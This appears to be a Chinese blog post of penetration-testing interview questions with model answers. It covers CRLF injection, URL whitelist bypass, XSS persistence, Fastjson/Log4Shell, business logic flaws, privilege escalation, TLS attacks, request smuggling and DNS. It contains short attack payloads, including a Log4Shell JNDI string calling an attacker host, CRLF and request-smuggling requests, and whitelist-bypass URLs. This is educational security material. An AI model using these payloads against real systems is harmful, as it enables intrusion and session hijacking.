2025年渗透测试面试题总结-240（题目+回答）

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

282. CRLF注入原理

283. URL白名单绕过技巧

284. XSS持久化实现方式

285. Fastjson/Log4j漏洞原理与修复

Fastjson反序列化漏洞

Log4j JNDI注入（Log4Shell）

286. 业务逻辑漏洞本质

287. 业务逻辑漏洞类型

288. 高风险账户状态

289. 明文传输身份标识的风险

290. 水平越权触发点

291. 水平越权检测方式

292. ID遍历 vs 账号互测优劣对比

293. APP灰色按钮绕过方法

294. 流程绕过漏洞抽象归类

295. 常用协议漏洞

296. TLS 1.2协议交互与攻击

交互过程

攻击方法

297. HTTP请求走私原理

298. DNSSEC解决场景

299. DNS记录类型场景

300. 域名解析至1.1.1.1的利弊

282	CRLF注入原理？
283	URL白名单如何绕过？
284	XSS持久化如何实现？
285	Fastjson、Log4j常见漏洞原理？如何彻底解决该漏洞？
286	业务逻辑漏洞
287	业务逻辑漏洞有哪些具体类型？
288	哪些账户状态会导致预期外的风险？
289	身份标识明文传输会导致什么风险？
290	水平越权触发点会存在哪些位置？
291	水平越权有哪几种检测方式？
292	通过数字加减遍历或通过两个账号互测的方式进行水平越权测试有何优劣势？
293	某个APP的某个功能按钮是灰色不可用状态，如何绕过其限制？
294	流程绕过漏洞如何抽象理解归类？
295	常用协议漏洞
296	TLS1.2协议交互过程以及攻击方法？
297	HTTP请求走私（HTTPRequestSmuggling）原理
298	DNSSEC能解决什么场景问题？
299	DNS中（DS、PTR、TXT选其一）记录类型的常用作什么场景？
300	将暂时不用的域名解析到1.1.1.1有什么好处和坏处？

282. CRLF注入原理

原理：通过注入回车符（%0d）和换行符（%0a） 控制HTTP响应结构，实现响应头/体分裂或会话固定攻击。

• 攻击链：
  用户输入 → 未过滤的\r\n → 篡改响应头（如Set-Cookie）或构造恶意响应体
• 典型场景：

  httpGET /?param=test%0d%0aSet-Cookie:sessionid=恶意值 HTTP/1.1 → 响应头被注入： HTTP/1.1 200 OK Set-Cookie: sessionid=恶意值 // 攻击者设置的会话ID 

---

283. URL白名单绕过技巧

目标：突破域名/IP校验限制，访问非授权资源。
方法：

1. 解析差异利用：
   • @符号混淆：http://expected.com@attacker.com → 实际访问attacker.com 。
   • 域名前缀篡改：attacker.expected.com （若白名单校验不完整）。
2. 重定向漏洞：
   • 白名单内域名跳转至外部：http://trusted.com/redirect?url=http://evil.com 。
3. 非常规IP格式：
   • 十进制IP：http://2130706433（等价于127.0.0.1）。
   • IPv6缩写：http://[::1]。
4. DNS重绑定：
   • 域名首次解析为白名单IP，TTL过期后解析为攻击IP。

---

284. XSS持久化实现方式

目的：长期保留恶意脚本，避免被清除。
方法：

1. 存储型XSS结合：
   • 注入用户资料页/公告板等高频访问位置。
2. DOM存储滥用：
   • 利用localStorage/sessionStorage存储Payload，通过页面JS循环加载。
3. 服务端日志注入：
   • 恶意脚本写入访问日志，管理员查看日志时触发。
4. 第三方资源污染：
   • 篡改CDN资源或广告脚本（需更高权限）。

---

285. Fastjson/Log4j漏洞原理与修复

Fastjson反序列化漏洞

• 原理：@type属性指定恶意类，触发JNDI注入（如com.sun.rowset.JdbcRowSetImpl ）。
• 修复：
  1. 升级至≥1.2.83（默认关闭AutoType）。
  2. 使用SafeMode彻底禁用AutoType。

Log4j JNDI注入（Log4Shell）

• 原理：${jndi:ldap://attacker.com} 触发远程类加载。
• 修复：
  1. 升级Log4j至≥2.17.0（默认禁用JNDI）。
  2. JVM参数添加：-Dlog4j2.formatMsgNoLookups=true 。
  3. 彻底解决方案：移除log4j-core中的JndiLookup类文件。

---

286. 业务逻辑漏洞本质

定义：违反业务规则的设计缺陷，非技术层漏洞（如身份验证/流程控制缺陷）。
核心问题：

1. 过度信任客户端：未校验服务端关键状态（如订单价格）。
2. 流程顺序缺失：跳过验证步骤（如支付跳步）。
3. 竞争条件滥用：并发重复提交（积分兑换）。

---

287. 业务逻辑漏洞类型

类型	案例
验证绕过	修改参数isAdmin=1提权
重复提交	无限领取优惠券（无幂等校验）
条件竞争	高并发请求导致余额超额
参数篡改	前端修改商品价格/数量
流程跳跃	跳过短信验证直接重置密码

---

288. 高风险账户状态

状态	风险场景
未激活账户	攻击者冒用身份注册大量僵尸号
休眠账户	弱口令被撞库后长期未被发现
特权账户	管理员离职后权限未回收
共享账户	责任追溯困难，密码泄露扩散

---

289. 明文传输身份标识的风险

1. 中间人窃取：
   • Cookie/Session ID被嗅探，劫持用户会话。
2. 日志泄露：
   • 身份信息写入日志，未脱敏存储。
3. 重放攻击：
   • 截获Token重复使用（如一次性密码）。

---

290. 水平越权触发点

常见位置：

1. URL参数：用户ID/订单ID（如/user?id=123）。
2. 请求体参数：JSON/XML中的资源ID。
3. 文件名/路径：/download?file=user123.doc 。
4. 隐藏表单字段：HTML中嵌入的用户标识。

---

291. 水平越权检测方式

方法	适用场景
ID遍历	可预测资源ID（连续数字）
账号切换比对	登录A账号访问B账号的资源
参数篡改	修改请求中的用户标识字段
工具自动化	Burp Intruder批量替换ID

---

292. ID遍历 vs 账号互测优劣对比

维度	ID遍历	账号互测
效率	高（脚本批量爆破）	低（需多账号手动切换）
隐蔽性	低（大量异常请求易触发告警）	高（模拟正常用户）
覆盖度	全量ID测试	仅测试账号权限边界
适用性	资源ID可预测时有效	需多账号权限相同

---

293. APP灰色按钮绕过方法

1. 前端修改：
   • 反编译APP删除android:enabled="false"属性。
   • Hook框架（Frida）强制启用按钮点击事件。
2. 协议重放：
   • 抓包拦截正常功能请求，修改参数后重放。
3. 版本降级：
   • 安装旧版APK（该功能未禁用时版本）。

---

294. 流程绕过漏洞抽象归类

可归类为 “状态机缺陷” ：

1. 状态缺失校验：
   • 未验证前置条件（如未支付直接发货）。
2. 状态逆向流转：
   • 从终态回退至初态（如已退款订单重新支付）。
3. 并行状态冲突：
   • 并发操作导致状态不一致（如双人同时抢单）。

---

295. 常用协议漏洞

协议	漏洞类型	案例
FTP	明文传输	凭据嗅探
SMB	永恒之蓝（EternalBlue）	MS17-010 RCE
DNS	缓存投毒	篡改域名解析结果
LDAP	注入攻击	(&(user=*))(cn=*)) 过滤器绕过

---

296. TLS 1.2协议交互与攻击

交互过程

1. Client Hello：客户端支持密码套件列表+随机数。
2. Server Hello：服务端选定套件+随机数+证书。
3. 密钥交换：客户端生成预主密钥，用证书公钥加密传输。
4. Finished：双方计算并校验加密MAC。

攻击方法

1. 降级攻击（POODLE）：强制协商TLS 1.0使用CBC模式填充漏洞。
2. BEAST攻击：利用CBC初始化向量（IV）可预测性解密数据。
3. 心脏出血（Heartbleed）：OpenSSL心跳扩展内存泄露（非TLS本身问题）。

---

297. HTTP请求走私原理

本质：利用前后端解析差异（如Content-Length与Transfer-Encoding冲突），将单次请求拆分为多次处理。

• 攻击链：

  httpPOST / HTTP/1.1 Content-Length: 13 // 后端优先识别此字段 Transfer-Encoding: chunked // 前端识别此字段 0\r\n // 前端认为结束 \r\n GET /admin HTTP/1.1 // 后端认为属于下一次请求

危害：绕过访问控制、缓存投毒。

---

298. DNSSEC解决场景

核心问题：防止DNS响应篡改（如中间人攻击）。
适用场景：

1. 域名解析真实性：验证应答是否被伪造（通过RRSIG数字签名）。
2. 权威链信任：从根域名逐级验证DS记录（Delegation Signer）。
   局限：无法防御DDoS攻击或域名劫持（如注册商层面）。

---

299. DNS记录类型场景

TXT记录：

• 用途：
  1. 域名所有权验证（如google-site-verification=xxx）。
  2. SPF反垃圾邮件（声明授权发信IP）。
  3. DMARC策略配置（邮件认证协议）。
• 风险：过长的TXT记录可被用于DDoS放大攻击。

---

300. 域名解析至1.1.1.1的利弊

维度	好处	坏处
安全	避免域名闲置时被恶意抢注	1.1.1.1为Cloudflare DNS服务IP，可能被误判为恶意流量
成本	无需维护解析记录	用户访问1.1.1.1可能被拦截（如企业防火墙策略）
体验	快速响应（Cloudflare全球节点）	无法展示自定义维护页面

建议：临时解析建议返回NXDOMAIN，或指向专用提示页。